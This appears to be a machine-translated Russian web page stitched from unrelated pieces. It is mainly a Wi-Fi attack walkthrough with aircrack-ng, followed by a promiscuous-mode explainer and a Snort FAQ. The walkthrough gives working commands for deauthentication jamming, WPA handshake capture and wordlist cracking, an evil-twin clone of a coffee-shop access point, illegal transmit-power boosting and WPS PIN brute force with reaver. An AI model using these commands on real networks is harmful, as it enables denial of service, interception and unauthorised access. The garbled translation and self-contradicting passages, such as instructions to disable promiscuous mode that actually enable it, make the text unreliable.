    D0: 57: 94: B8: AC : F6 -62 6 0 0 1130 WPA2 CCMP PSK УДАЛЕН
    AC: 84: C6: 55: 95: B8 -77 2 0 0 11 270 WPA2 CCMP PSK REMO VED
    58: EF: 68: 07: BE: 07-83 4 5 0 1130 WPA2 CCMP PSK REMOVED
    AC: E2: D3: 31: 2A: 14-103 2 0 0 6 65 WPA2 CCMP PSK <длина: 23 > BSSID STATION PWR Rate Lost Frames Notes Probes C0: 3E: 0F: 2A: F4: 8D FC: A1: 83: 93: 55: C9 -58 0 -24e 0 2
    58: EF: 68: 07: BE: 07 24 : 4C: E3: 5C: 0E: 73-3 0 -24e 46 2
    58: EF: 68: 07: BE: 07 10: AE: 60: 27: 17: 55 -20 0 - 0e 0 5
    58: EF: 68: 07: BE: 07 68: 54: FD: C4: 19: B5 -43 0 -24e 0 14
    58: EF: 68: 07: BE: 07 60: AB: 14: 25: EB: 48-77 0 - 1 6 3
    58: EF: 68: 07: BE: 07 38: 71: DE: F1: B6: 8C -81 0 - 1 5 2
    58: EF: 68: 07: BE: 07 40: A2: DB: 0E: DF: 49-87 0–1 0 1
    • BSSID — это MAC-адрес беспроводной точки доступа (AP )
    • PWR — сила беспроводного сингла, чем ближе к 0, тем лучше.
    • CH — канал, который использует точка беспроводного доступа (AP)
    • ESSID — имя беспроводной сети или SSID
    • STATION — MAC-доступ беспроводного клиента, подключенного к AP

    Если мы хотим перехватить беспроводной ключ WEP, WPA или WPA2, вы должны сделать это следующим образом.

     root @ kali: ~ #  airodump-ng -c 6 -w SCAN --bssid E8: AD: A6: E0: 45: A4 wlan0  

    Приведенная выше команда сканирует точку доступа с MAC-адресом E8: AD: A6: E0: 45: A4 на канале 6.Дамп захвата будет сохранен в файлах, начиная с SCAN.

     root @ kali: ~ #  ls -la | grep SCAN  
    -rw-r - r-- 1 корень root 139345 25 октября 19:00 SCAN-01.cap
    -rw-r - r-- 1 root root 771 25 октября 19:00 SCAN-01. csv
    -rw-r - r-- 1 корневой корень 594 25 октября 19:00 SCAN-01.kismet.csv
    -rw-r - r-- 1 корневой корень 5881 25 октября 19:00 SCAN-01. kismet.netxml
    -rw-r - r-- 1 root root 47062 25 октября 19:00 SCAN-01.log.csv

    Во время сканирования в верхней части файла будет отображаться что-то вроде этого…

     CH 6 ] [Прошло: 6 с] [2020-10-25 18:59 

    Как только беспроводной клиент аутентифицируется, вы увидите это.Это показатель того, что вы готовы приступить к взлому.

     CH 6] [Прошло: 3 минуты] [2020-10-25 19:02] [ WPA рукопожатие: E8: AD: A6: E0: 45: A4  

    Вы также можете сканировать определенную беспроводную сеть нравится.

     root @ kali: ~ # airodump-ng --bssid E8: AD: A6: E0: 45: A4 --essid  WIRELESS_SSID  wlan0 

    Просто замените « WIRELESS_SSID » на фактический SSID беспроводной сети с «». airodump-ng ». Вы также можете сузить это до определенного канала, если хотите.

    aireplay-ng

     root @ kali: ~ #  aireplay-ng --help  Aireplay-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe 
    https: //www.aircrack-ng.orgиспользование: aireplay -ng <параметры> <интерфейс воспроизведения> Параметры фильтра: -b bssid: MAC-адрес, точка доступа
    -d dmac: MAC-адрес, пункт назначения
    -s smac: MAC-адрес, источник
    -m len: минимальная длина пакета
    -n len: максимальная длина пакета
    -u тип: управление кадром, поле типа
    -v subt: управление кадром, поле подтипа
    -t tods: управление кадром, бит DS
    -f fromds: управление кадром, бит из DS
    -w iswep: управление кадрами, бит WEP
    -D: отключить обнаружение точки доступа Параметры воспроизведения: -x nbpps: количество пакетов в секунду
    -p fctrl: установить управляющее слово кадра (шестнадцатеричное)
    -a bssid: установить MAC-адрес точки доступа
    -c dmac: установить MAC-адрес назначения
    -h smac: установить MAC-адрес источника
    -g значение: изменить размер кольцевого буфера (по умолчанию: 8) 9 0004 -F: выбрать первый соответствующий пакет Параметры атаки подделки: -e essid: установить SSID целевой точки доступа
    -o npckts: количество пакетов на пакет (0 = автоматически, по умолчанию: 1)
    -q sec: секунды между keep-alive
    - Q: отправить запросы на повторную ассоциацию
    -y prga: поток ключей для аутентификации с общим ключом
    -T n: выйти после повторной попытки поддельный запрос аутентификации n timeArp Параметры атаки воспроизведения: -j: ввести пакеты FromDS Параметры атаки фрагментацией: -k IP: установить целевой IP-адрес во фрагментах
    -l IP: установить исходный IP-адрес во фрагментах Параметры тестовой атаки: -B: активировать тестовую скорость передачи данных Параметры источника: -i iface: захватить пакеты с этого интерфейса
    -r file: извлечь пакеты из этого файла pcap Прочие параметры: -R: отключить / dev / rtc usage
    --ignore-negative-one: если канал интерфейса не может быть определен,
    игнорирует несоответствие, необходимое для непропатченного cfg80211
    --deauth-rc rc: Код причины деаутентификации [0-254] (по умолчанию: 7) А Режимы ttack (числа все еще можно использовать): - deauth count: деаутентификация 1 или всех станций (-0)
    --fakeauth delay: поддельная аутентификация с AP (-1)
    --interactive: интерактивный выбор кадра (-2)
    --arpreplay: стандартное воспроизведение ARP-запроса (-3)
    --chopchop: дешифровать / chopchop WEP-пакет (-4)
    --fragment: генерирует допустимый ключевой поток (-5)
    --caffe-latte: запрашивать клиента для новых IV (-6)
    --cfrag: фрагменты против клиента (-7)
    --migmode: атакует режим миграции WPA (-8)
    --test: тестирует внедрение и качество (-9) - help: Отображает этот экран использования

    В приведенном выше разделе вы заметите, что вам нужно дождаться, пока беспроводной клиент аутентифицируется, чтобы вы перехватили рукопожатие WPA.Способ, которым вы можете помочь, — это отправить сигнал отключения всем клиентам в беспроводной сети и заставить их пройти повторную аутентификацию. Аргумент -0 взят из приведенной выше справки « деаутентификация 1 или всех станций ». Число после него, « 0 », указывает ему продолжать работу, или вы можете указать конкретный номер.

     root @ kali: ~ #  aireplay-ng -0 0 -a E8: AD: A6: E0: 45: A4 wlan0  
    17:40:25 Ожидание кадра маяка (BSSID: E8: AD: A6: E0 : 45: A4) на канале 6
    NB: эта атака более эффективна при нацеливании на
    подключенного беспроводного клиента (-c ).
    17:40:26 Отправка DeAuth (код 7) в широковещательную рассылку - BSSID: [E8: AD: A6: E0: 45: A4]
    17:40:26 Отправка DeAuth (код 7) в широковещательную рассылку - BSSID: [ E8: AD: A6: E0: 45: A4]
    17:40:27 Отправка DeAuth (код 7) в широковещательную рассылку - BSSID: [E8: AD: A6: E0: 45: A4]
    17:40:27 Отправка DeAuth (код 7) для трансляции - BSSID: [E8: AD: A6: E0: 45: A4]
    17:40:28 Отправка DeAuth (код 7) для трансляции - BSSID: [E8: AD: A6: E0 : 45: A4]
    17:40:28 Отправка DeAuth (код 7) в широковещательную рассылку - BSSID: [E8: AD: A6: E0: 45: A4]

    На самом деле это очень серьезная атака отказа в обслуживании, и я Я не знаю, как это остановить.Если вы запускаете команду постоянно, она будет продолжать отключать всех беспроводных клиентов, эффективно сигнализируя о глушении всей сети. Если вы знаете, как предотвратить эту атаку, не могли бы вы оставить комментарий, о нем было бы неплохо узнать.

    Если по какой-то причине « airplay-ng » жалуется, что ваша беспроводная сетевая карта не находится на том же канале, что и цель, это легко исправить. Если, например, беспроводная сеть, обнаруженная с помощью « airodump-ng », находится на канале 6, вы можете запустить это.

     root @ kali: ~ #  iwconfig wlan0 channel 6  

    Фактически вы можете настроить таргетинг на конкретного беспроводного клиента в такой сети.

     root @ kali: ~ #  aireplay-ng -0 5 -a E8: AD: A6: E0: 45: A4 -c TARGET_MAC wlan0  

    Используя « airodump-ng », вы можете увидеть MAC-адреса беспроводные клиенты в каждой сети. Если вы замените « TARGET_MAC» на MAC-адрес жертвы беспроводного клиента, он будет нацелен именно на них. Я также показал вам, как отправить 5 отключений вместо непрерывного выполнения команды.

    Вариант « 9 », как и « -9 », также очень полезен и будет выполнять « проверки впрыска и качества ».

     root @ kali: ~ #  aireplay-ng -9 wlan0  
    04:44:51 Пробуем широковещательные пробные запросы ...
    04:44:51 Инъекция работает!
    04:44:53 Найдено 3 APs04: 44: 53 Пробные запросы направленного зондирования ...
    04:44:53 D0: 57: 94: B8: AC: F6 - канал: 1 - «УДАЛЕНО»
    04:44: 53 Ping (мин. / Сред. / Макс.): 1,966 мс / 7,358 мс / 29,551 мс Мощность: -62.40
    04:44:53 30/30: 100% 04: 44: 53 62: FE: 3B: CE: 9E: 59 - канал: 1 - «УДАЛЕНО»
    04:44:59 Ping (min / avg / max ): 2,784 мс / 5,262 мс / 7,740 мс Мощность: -95,00
    04:44:59 2/30: 6% 04: 44: 59 58: EF: 68: 07: BE: 07 - канал: 1 - 'УДАЛЕН'
    04:45:05 0/30: 0%

    Вы можете провести такой тест атаки.

     root @ kali: ~ #  aireplay-ng -9 -i wlan1 wlan0  

    Опция « 9 », как в « -9 », также очень полезна и будет выполнять: « проверяет впрыск и качество. »

    « -i wlan1 »- это интерфейс для имитации точки доступа и приема пакетов.

    « wlan0 » — интерфейс впрыска.

    aircrack-ng

     root @ kali: ~ #  aircrack-ng --help  Aircrack-ng 1.6 - (C) 2006-2020 Thomas d'Otreppe 
    https : //www.aircrack-ng.orgusage: aircrack-ng [параметры] <входной файл (ы)> Общие параметры: -a : режим принудительной атаки (1 / WEP, 2 / WPA-PSK)
    -e : выбор цели: сетевой идентификатор
    -b : выбор цели: MAC-адрес точки доступа
    -p : количество используемых ЦП (по умолчанию: все ЦП)
    -q: включить тихий режим (без статуса output)
    -C : объединить данные AP с виртуальным
    -l : записать ключ в файл.Перезаписывает файл. Параметры статического взлома WEP: -c: искать только буквенно-цифровые символы
    -t: искать только двоично-десятичные символы chr
    -h: искать цифровой ключ для Fritz! BOX
    -d <маска>: использовать маскирование ключ (A1: XX: CF: YY)
    -m : MAC-адрес для фильтрации используемых пакетов
    -n : Длина ключа WEP: 64/128/152/256/512
    -i : Индекс ключа WEP (от 1 до 4), по умолчанию: любой
    -f : коэффициент подбора грубой силы, по умолчанию: 2
    -k : отключить один метод атаки (от 1 до 17)
    -x или -x0: отключить bruteforce for last keybytes
    -x1: last keybyte bruteforcing (default)
    -x2: enable last 2 keybytes bruteforcing
    -X: disable bruteforce multithreading
    -y: экспериментальный одиночный режим bruteforce
    -K: использовать только старые атаки KoreK (до PTW)
    -s: показать ключ в ASCII при взломе
    -M : указать максимальное количество IV для использования
    -D : WEP decloak, пропускает битые потоки ключей
    -P : Отладка PTW: 1: отключение Klein, 2: PTW
    -1: запускать только 1 попытка взлома ключа с помощью PTW
    -V: запускать в режиме визуальной проверки WEP и WPA- Параметры взлома PSK: -w <слова>: путь к списку слов имя файла (а)
    -N <файл>: путь к имени файла нового сеанса
    -R <файл>: путь к имени файла существующего сеанса Параметры WPA-PSK: -E <файл>: создать файл проекта EWSA v3
    -I : строка PMKID (hashcat -m 16800)
    -j <файл>: создать Hashcat v3.6+ файл (HCCAPX)
    -J <файл>: создать файл Hashcat (HCCAP)
    -S: Тест скорости взлома WPA
    -Z : Длина теста скорости взлома WPA
    выполнения.
    -r : путь к базе данных airolib-ng
    (не может использоваться с -w) Выбор SIMD: - simd-list: Показать список доступных архитектур
    SIMD для этой машины
    .
    --simd =

    « aircrack-ng » используется для взлома беспроводных ключей WEP, WPA и WPA2.

    Как я уже упоминал выше, мы ищем этот результат в « airodump-ng ».

     Как только беспроводной клиент аутентифицируется, вы увидите это. CH 6] [Прошло: 3 минуты] [2020-10-25 19:02] [ WPA рукопожатие: E8: AD: A6: E0: 45: A4  

    Это означает, что мы успешно зафиксировали рукопожатие WPA между беспроводным клиентом и точкой доступа (AP).

    В разделе « airodump-ng » этой статьи я также показал вам, как записать это рукопожатие WPA в файл захвата.

     root @ kali: ~ #  ls -la | grep SCAN  
    -rw-r - r-- 1 корень root 139345 25 октября 19:00 SCAN-01.cap
    -rw-r - r-- 1 root root 771 25 октября 19:00 SCAN-01. csv
    -rw-r - r-- 1 корневой корень 594 25 октября 19:00 SCAN-01.kismet.csv
    -rw-r - r-- 1 корневой корень 5881 25 октября 19:00 SCAN-01. kismet.netxml
    -rw-r - r-- 1 root root 47062 25 октября 19:00 SCAN-01.log.csv

    В основном у вас будет два способа взломать пароль беспроводной сети. Либо путем атаки по словарю, либо с помощью грубой силы.Я рекомендую прочитать другую мою статью «Этический взлом (часть 4): взлом паролей и хешей», в которой я подробно расскажу об этих методах.

    «Атака по словарю » использует не только слова из словаря. Он будет использовать любой часто используемый пароль или комбинацию паролей. Может быть, какая-нибудь обычная последовательность клавиатуры или что-то распространенное, например «Пароль1!» будет взломан мгновенно. Существует очень большой список слов под названием « rockyou.txt », который в настоящее время содержит 14344391 паролей.

     root @ kali: ~ #  apt-get install wget -y  root @ kali: ~ #  wget   https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt  root @ kali: ~ #  wc -l rockyou.txt  
    14344391 rockyou.txt

    Вы можете использовать этот список слов с « aircrack-ng » следующим образом.

     root @ kali: ~ #  aircrack-ng -w rockyou.txt SCAN_test-01.cap -e ESSID  
    • rockyou.txt — это список слов, который мы загрузили
    • SCAN_test-01.cap — это файл захвата, созданный « airodump-ng »
    • e ESSID — имя / SSID целевой беспроводной сети

    Во время работы он будет выглядеть так…

     Aircrack- ng 1.6 [00:00:10] 50654/14344391 ключ протестирован (5021,50 k / s) Оставшееся время: 47 минут, 26 секунд 0,35% Текущая кодовая фраза: lucky! Мастер-ключ: 56 BE BE F6 9B 3B CE 8B D8 A1 A2 23 C1 CB 3D C4 
    30 DA A8 DB 75 40 3C B2 43 CA 58 55 6D 2E 8B 01 Переходный ключ: D6 48 80 29 CB 04 46 AA 1E F1 22 5F 61 37 17 0A
    94 96 C0 12 F1 F0 BD 3C 12 5D 15 B4 DD 65 4F DB
    07 65 91 F7 DE 3E 9F 01 37 D5 ED 96 E4 B5 74 49
    7A 68 46 27 CE 6F C9 F1 86 23 42 91 E2 2C CF 5EEAPOL HMAC: C3 51 8D 09 F2 2D 7E C4 70 5B 3C C9 DD B7 78 FB

    5021 ключ в секунду — это неплохо для виртуальной машины 🙂 Однако я дал своему экземпляру Kali два процессора и 8 ГБ памяти.

    Второй метод — это атака полным перебором. Теперь он будет проверять каждую комбинацию каждого символа, что в наши дни является невыполнимой задачей с использованием надежных паролей. Однако это можно сделать, если вы можете сузить область поиска, указав размер паролей или диапазон размеров пароля. Его можно сузить, если вы знаете какой-либо из символов паролей (возможно, в определенной позиции). Его можно сузить, если есть какие-либо символы или наборы символов, которые вы можете исключить.Например, если вы знаете, что пароль будет состоять из 8 символов и быть буквенно-цифровым, он будет очень быстро взломан.

    Инструмент, который вы захотите использовать для этого, называется « crunch ». Этот инструмент очень многофункциональный, и здесь невозможно описать все. Лучше всего открыть руководство для него (« man crunch ») и прокрутить вниз до примеров в конце.

    Основное использование выглядит следующим образом.

     root @ kali: ~ #  crunch -F aircrack-ng -w - SCAN_test-01.cap -e ESSID  

    airbase-ng

     root @ kali: ~ #  airbase-ng --help  Airbase-ng 1.6 - (C) 2008-2020 Thomas d'Otreppe 
    Оригинальная работа: Martin Beck
    https: //www.aircrack-ng.orgusage: airbase-ng <параметры> <интерфейс воспроизведения> Параметры: -a bssid: установить MAC-адрес точки доступа
    -i iface: захватывать пакеты с этого интерфейса
    -w ключ WEP: использовать этот WEP ключ для шифрования / дешифрования пакетов
    -h MAC: исходный Mac для режима MITM
    -f disallow: запретить указанные клиентские MAC-адреса (по умолчанию: разрешить)
    -W 0 | 1: [не] устанавливать флаг WEP в маяках 0 | 1 (по умолчанию: авто)
    -q: тихо (не выводить статистику)
    -v: подробный (выводить больше сообщений)
    -A: режим Ad-Hoc (позволяет другим клиентам подключаться)
    -Y in | out | both : внешняя обработка пакетов
    -c канал: устанавливает канал, на котором работает точка доступа
    -X: скрытый ESSID
    -s : принудительная проверка подлинности с использованием общего ключа (по умолчанию: авто)
    -S: установка длины запроса общего ключа (по умолчанию: 128)
    -L: Атака Caffe-Latte WEP (используется, если драйвер не может отправлять фрагменты)
    -N: cfrag WEP-атака (рекомендуется)
    -x nbpps: количество пакетов в секунду (по умолчанию: 100)
    -y: отключает ответы на широковещательные зонды
    -0: устанавливает все WPA, WEP, открытые теги.не может использоваться с -z & -Z
    -z type: устанавливает теги WPA1. 1 = WEP40 2 = TKIP 3 = WRAP 4 = CCMP 5 = WEP104
    -Z тип: то же, что -z, но для WPA2
    -V тип: поддельный EAPOL 1 = MD5 2 = SHA1 3 = авто
    -F префикс: запись все отправленные и полученные кадры в файл pcap
    -P: отвечать на все зонды, даже при указании ESSID
    -I interval: устанавливает значение интервала маяка в мс
    -C секунд: разрешает передачу проверенных значений ESSID (требуется -P)
    -n шестнадцатеричный: пользователь указывает AN один раз при выполнении четырехстороннего рукопожатия Параметры фильтра:
    --bssid MAC: BSSID для фильтрации / использования
    --bssids file: прочитать список BSSID из этого файла
    --client MAC: MAC of client to filter
    --clients file: прочитать список MAC-адресов из этого файла
    --essid ESSID: указать единственный ESSID (по умолчанию: по умолчанию)
    --essids file: прочитать список ESSID из этого файла - help: отображает этот экран использования.

    « airbase-ng » позволяет создать или клонировать Wi-Fi. безотказная точка доступа (AP).Клонирование точки беспроводного доступа — вот как проводится атака « злой близнец ».

    Приведу пример. Вы находитесь в кофейне, запускаете « airodump-ng » и выполняете поиск беспроводных сетей. Вы определяете беспроводную связь, предоставляемую кофейней, и все подключенные устройства.

    Итак, ради интереса давайте использовать следующее:

    • Имя беспроводной сети / SSID: CoffeeShop
    • MAC-адрес беспроводной точки доступа: E8: AD: A6: B0: 46: C5
    • Канал: 6
     root @ kali: ~ #  airbase-ng -a E8: AD: A6: B0: 46: C5 --essid "CoffeeShop" -c 6 wlan0  
    12:45:06 Создан интерфейс tap at0
    12:45:06 Попытка установить MTU at0 до 1500
    12:45:06 Точка доступа с BSSID E8: AD: A6: B0: 46: C5 запущена.

    Теперь мы клонировали настоящую точку доступа в кофейне. Посылая сигнал отключения беспроводным клиентам, они все попытаются повторно подключиться.

     root @ kali: ~ #  aireplay-ng -0 0 -a E8: AD: A6: E0: 45: A4 wlan0  

    Поскольку ваше устройство будет ближе и будет иметь более сильный сигнал, чем фактическая точка доступа, беспроводная связь все клиенты будут ассоциироваться с вашим экземпляром Kali. Также возможно усилить сигнал на картах беспроводного доступа, увеличивая вероятность подключения беспроводных клиентов к вам.

     root @ kali: ~ #  ifconfig wlan0 down 
    root @ kali: ~ # iw reg set BO
    root @ kali: ~ # ifconfig wlan0 up
    root @ kali: ~ # iwconfig wlan0 канал 13
    root @ kali: ~ # iwconfig wlan0 txpower 30

    Если у нас есть две карты сетевого интерфейса в нашем экземпляре Kali linux, мы могли бы получить первый интерфейс для сопряжения с реальной точкой доступа и второй интерфейс для клонирования точки доступа какие беспроводные клиенты будут подключаться.Выполнив хитроумные мосты, обновив маршрутизацию и обновив таблицы IP, вы можете направить весь трафик через вас.

    Я не собираюсь описывать мостовую часть в этой статье, но в качестве подсказки для начала вам потребуется установить « bridge-tools ».

     root @ kali: ~ #  apt-get install bridge-utils -y  
    Чтение списков пакетов ... Готово
    Построение дерева зависимостей
    Чтение информации о состоянии ... Готово
    bridge-utils - это уже новейшая версия (1 .6-3).
    0 обновлено, 0 установлено заново, 0 удалено и 330 не обновлено.

    Затем вы бы сделали что-то вроде этого…

     root @ kali: ~ #  brctl addbr br0  root @ kali: ~ #  brctl show  
    имя моста идентификатор моста Интерфейсы с поддержкой STP
    br0 8000.000000000000 noroot @ kali: ~ # brctl addif br0
    root @ kali: ~ # brctl addif br0
    root @ kali: ~ # ifconfig br0 up

    Если вы хотите попробовать это, есть довольно хорошее объяснение в вики Debian.

    WPS — немного сумасшедшая функция с точки зрения безопасности. Я понятия не имею, почему большинство беспроводных маршрутизаторов поставляются с включенным устройством. Я рекомендую выключить это.

     root @ kali: ~ #  wash -i wlan0  
    BSSID Ch dBm WPS Lck Vendor ESSID
    --------------------------- -------------------------------------------------- ---
    D0: 57: 94: B8: AC: F6 1-66 1.0 Нет УДАЛЕНО
    26: 4C: E3: 5C: 8E: 73 1-14 2,0 ​​ Нет Broadcom УДАЛЕНО
    58: EF: 68 : 07: BE: 07 1-84 2.0 Нет RealtekS REMOVED
    40: C7: 29: 22: 43: 7E 11-98 2,0 Нет Broadcom REMOVED

    Если вы запустите « Wash » и увидите « Нет » в строке « Lck» ”маршрутизатор уязвим.

    Давайте посмотрим на первый, используя « reaver ».

     root @ kali: ~ #  iwconfig wlan0 channel 6  root @ kali: ~ #  reaver -b D0: 57: 94: B8: AC: F6 -i wlan0 -c 1 -vv  Reaver v1.6.1 WiFi Protected Setup Attack Tool 
    Авторские права (c) 2011, Tactical Network Solutions, Craig Heffner [+] Переключение wlan0 на канал 1
    [+] Ожидание маяка от D0: 57: 94: B8: AC: F6
    [+] Связано с D0: 57: 94: B8: AC: F6 (ESSID: REMOVED )
    [+] Пробуем пин "12345670"

    Просто чтобы вы знали, приличные маршрутизаторы с включенным WPS будут пытаться предотвратить эти атаки. Если у вас есть определенное количество неудачных попыток в течение определенного периода времени, они будут ограничены по скорости и заблокированы на некоторое время. Это обрабатывается следующим образом: « -r 4:60 », что означает 4 попытки каждые 60 секунд.

    Что такое неразборчивый режим?

    Что такое неразборчивый режим?

    В компьютерных сетях беспорядочный режим — это режим работы, а также метод безопасности, мониторинга и администрирования. В беспорядочном режиме сетевое устройство, такое как адаптер в хост-системе, может перехватить и полностью прочитать каждый поступающий сетевой пакет.

    Этот режим применяется как к проводной сетевой карте, так и к беспроводной сетевой карте. В обоих случаях это заставляет контроллер передавать весь трафик , который он получает, в центральный процессор, а не только кадры, которые он специально запрограммирован для приема.

    Это позволяет инструменту мониторинга сети проверять содержимое передачи на предмет потенциальных угроз.

    В локальной сети Ethernet (LAN) неразборчивый режим гарантирует, что каждый передаваемый пакет данных будет принят и прочитан сетевым адаптером. Это означает, что адаптер не фильтрует пакеты. Вместо этого он передает каждый пакет операционной системе (ОС) или любому приложению мониторинга, установленному в сети.

    В сети этот режим работы используется для перехвата пакетов, практики сбора и регистрации пакетов, которые проходят через сеть для дальнейшего анализа, такого как анализ трафика или использования полосы пропускания.

    В беспорядочном режиме все передаваемые пакеты данных принимаются и читаются сетевыми адаптерами.

    Беспорядочный режим и анализ пакетов

    С помощью сниффинга пакетов можно запускать tcpdump для определенных интерфейсов. Tcpdump — это бесплатное программное обеспечение для анализа сетевых пакетов, которое позволяет пользователям отображать протокол управления передачей / Интернет-протокол (TCP / IP) и другие пакеты, передаваемые или получаемые по сети. Он работает под управлением интерфейса командной строки.Wireshark — еще одна популярная программа для сниффинга пакетов. Большинство используемых сегодня анализаторов пакетов основаны на программном обеспечении, хотя также используются аппаратные анализаторы пакетов.

    Любой сетевой интерфейс, подключенный к сети, может принимать любой бит трафика. Однако большинство настроено не делать этого. Программный анализатор пакетов использует неразборчивый режим для изменения этой конфигурации. Это позволяет интерфейсу или адаптеру передавать весь сетевой трафик вверх по стеку независимо от адресов назначения пакетов.

    Для работы в беспорядочном режиме в мостовой сети, которая соединяет несколько локальных сетей в одном домене, может потребоваться сетевая карта.

    Анализатор пакетов собирает весь трафик, проходящий через физический интерфейс, разделяет или повторно собирает его по мере необходимости, а затем регистрирует его в соответствии с требованиями сети.

    Сетевой адаптер находится в беспорядочном режиме, учитывая следующее:

    • Он был настроен вручную с помощью команды ifconfig или набора IP-ссылок.
    • Используется инструмент мониторинга.

    В мостовой сети от сетевого адаптера может потребоваться работа в неразборчивом режиме. В этом случае режим должен поддерживаться каждым сетевым адаптером, а также драйвером ввода / вывода в ОС хоста. Некоторым ОС для включения этого режима требуются права суперпользователя.

    Беспорядочный режим также можно настроить так, чтобы пакетные данные были доступны гостевой ОС или посетителю в хост-системе.

    Консоль Wireshark

    Что такое неразборчивый секс?

    В беспорядочном режиме сетевой адаптер пропускает все кадры, поэтому могут быть прочитаны даже кадры, предназначенные для других машин или сетевых устройств.Но в неразборчивом режиме, когда сетевая карта получает кадр, она отбрасывает его, если только он не адресован его конкретному адресу управления доступом к среде передачи или не является кадром с широковещательной или многоадресной адресацией.

    Итак, когда пакет данных передается в неразборчивом режиме, все устройства LAN прослушивают данные, чтобы определить, включен ли их сетевой адрес в пакет. Если это не так, пакет передается на следующее устройство LAN, пока не будет достигнут правильный сетевой адрес. Затем это устройство считывает данные.

    Какие недостатки беспорядочного режима?

    Беспорядочный режим часто используется для мониторинга сетевой активности и диагностики проблем с подключением. Иногда он передается серверу отслеживания сети, который захватывает и сохраняет все пакеты для анализа, например, для отслеживания использования сети.

    Однако из-за возможности доступа ко всему сетевому трафику в сегменте этот режим считается небезопасным. Например, в системе с несколькими виртуальными машинами беспорядочный режим позволяет каждому узлу видеть все сетевые пакеты, предназначенные для всех других виртуальных машин в этой системе, а не только пакеты, предназначенные для их виртуальных машин.

    Однако при отладке проблем tcpdump с сетевой картой не следует использовать в неразборчивом режиме, поскольку tcpdump не показывает, какие пакеты данных система принимает в нормальных условиях. Использование IP-адресов в выводе tcpdump для определения правильного пакета приведет к неверным выводам.

    Если отображение адреса Ethernet не включено, а сетевая карта находится в беспорядочном режиме, это будет — неправильно — показать, что в сети нет проблем. Это может привести к отключению сети.Чтобы предотвратить такие проблемы, важно использовать неразборчивый режим или включить отображение адреса Ethernet в tcpdump.

    В VMware включите неразборчивый режим на уровне группы портов вместо уровня виртуального коммутатора, чтобы снизить риски безопасности.

    Как отключить неразборчивый режим на сетевой карте

    Чтобы включить неразборчивый режим на физическом сетевом адаптере, запустите эту команду — как указано в документах поддержки Citrix для ее платформы виртуализации XenServer — в текстовой консоли: # ifconfig eth0 promisc.

    Запустите команду ifconfig и обратите внимание на результат:

     eth0 Link encap: Ethernet HWaddr 00: 1D: 09: 08: 94: 8A 
    inet6 addr: fe80 :: 21d: 9ff: fe08: 948a / 64 Область действия: Link
    UP BROADCAST RUNNING PROMISC MULTICAST MTU: 1500 Метрическая система: 1
    Пакеты RX: 23724 ошибок: 0 отброшено: 0 переполнений: 0 кадров: 0
    пакетов TX: 7517 ошибок: 0 отброшено: 0 переполнений: 0 несущая: 0
    коллизий: 0 txqueuelen: 1000
    байтов RX: 2169478 (2,0 МиБ) TX байт: 5423377 (5,1 MiB)
    Прерывание: 17

    Чтобы отключить неразборчивый режим, запустите эту команду в текстовой консоли XenServer: # ifconfig eth0 –promisc.

    Снова выполните команду ifconfig.

    Беспорядочный режим — обзор

    Часто задаваемые вопросы

    Следующие часто задаваемые вопросы, на которые ответили авторы этой книги, предназначены как для измерения вашего понимания концепций, представленных в этой главе, так и для помощи в их практической реализации. этих понятий. Чтобы получить ответы на свои вопросы по этой главе от автора, перейдите на сайт www.syngress.com/solutions и щелкните форму «Спросите автора» .

    Q: Как мне написать собственный препроцессор или плагины обнаружения?

    A: В подкаталоге шаблонов из основного каталога src содержатся файлы шаблонов. Существует набор шаблонов для подключаемых модулей обнаружения (sp_template.c и sp_template.h) и набор шаблонов для препроцессоров (spp_template.c и spp_template.h). Вам необходимо написать качественный препроцессор и плагины обнаружения; плохо написанные плагины могут замедлить работу Snort и, в некоторых случаях, вызвать сбои Snort.Скотт Кэмпбелл написал небольшой симпатичный препроцессор DNS (www.geocities.com/axonpotential/snort/19/). Он четко задокументирован, и мы рекомендуем вам взглянуть на него.

    Q: В Snort версии 2.0.0 все еще вызывают проблемы fragrouter и stick?

    A: Во время недавнего тестирования поставщиков IDS, проведенного http://nss.co.uk, они использовали как флешку, так и fragrouter для проверки обнаружения в рамках своей общей стратегии тестирования. Snort версии 1.8.6 показал хорошие результаты в этом тесте, пропустив только один или два типа атак с использованием палки и фрагроутера.Однако в Snort версии 2.0.0 были внесены улучшения для исправления этих недостатков. «IDS Group Test Report Edition 3» стоит прочитать; тестировщики в NSS написали отличный объективный отчет о ряде поставщиков IDS. Испытательное оборудование, которое они используют, чтобы подвергнуть IDS большой нагрузке, тоже довольно крутое.

    Q: Насколько быстро работает механизм декодирования?

    A: Один из самых популярных вопросов, которые задают Марти Рошу: «Как быстро работает Snort?» Правильно настроенная машина Snort может обрабатывать 100 МБ сетевого трафика (в зависимости от количества правил и конфигураций препроцессора).На более высоких уровнях от 200 до 350 МБ в секунду libpcap с большой скоростью считывает пакеты с сетевой карты, а затем вызывает функцию ProcessPacket () в Snort. Вызов ProcessPacket () использует циклы ЦП, что при высокой скорости приводит к перегрузке системы. Механизм декодирования получит трафик, но в среднем потеря пакетов составит 50 процентов. (В Linux для повышения производительности можно загрузить оптимизированную версию libpcap — http: //public.lanl.gov/cpw/.) Даже с оптимизированным драйвером libpcap препроцессоры должны быть точно настроены для обработки от 200 до 350 МБ трафика или, в некоторых случаях, должны быть отключены.

    Q: Изменится ли использование модели libpcap для высокоскоростных сетей?

    A: Архитектура Snort 2.0 позволяет использовать так называемые «плагины сбора данных». Эти плагины позволяют разработчику написать специальный драйвер сетевой карты захвата пакетов для конкретной операционной системы (Linux), и этот плагин предоставит Snort захват пакетов на гораздо более высоких скоростях.Сделав это, вы потеряете аспект переносимости Snort, поскольку он будет привязан к одной конкретной сетевой карте и операционной системе. Однако вы получите гораздо более высокую скорость захвата пакетов из-за тесной интеграции с сетевой картой, которая затем будет напрямую подключаться к Snort, тем самым уменьшая накладные расходы в системе из-за библиотеки libpcap.

    Q: Как включить Barnyard?

    A: Barnyard можно загрузить с сайта www.snort.org/dl/barnyard.После загрузки выполните следующие действия:

    1

    Скомпилируйте исходный код Barnyard и установите.

    2

    Настройте файл конфигурации snort.conf и установите Snort для «Унифицированного режима» (см. Предыдущий раздел Barnyard and Unified Output ).

    3

    Настройте файл конфигурации Barnyard.conf с желаемым форматом вывода.

    4

    Запустите Snort, а затем запустите Barnyard.

Добавить комментарий

Ваш адрес email не будет опубликован.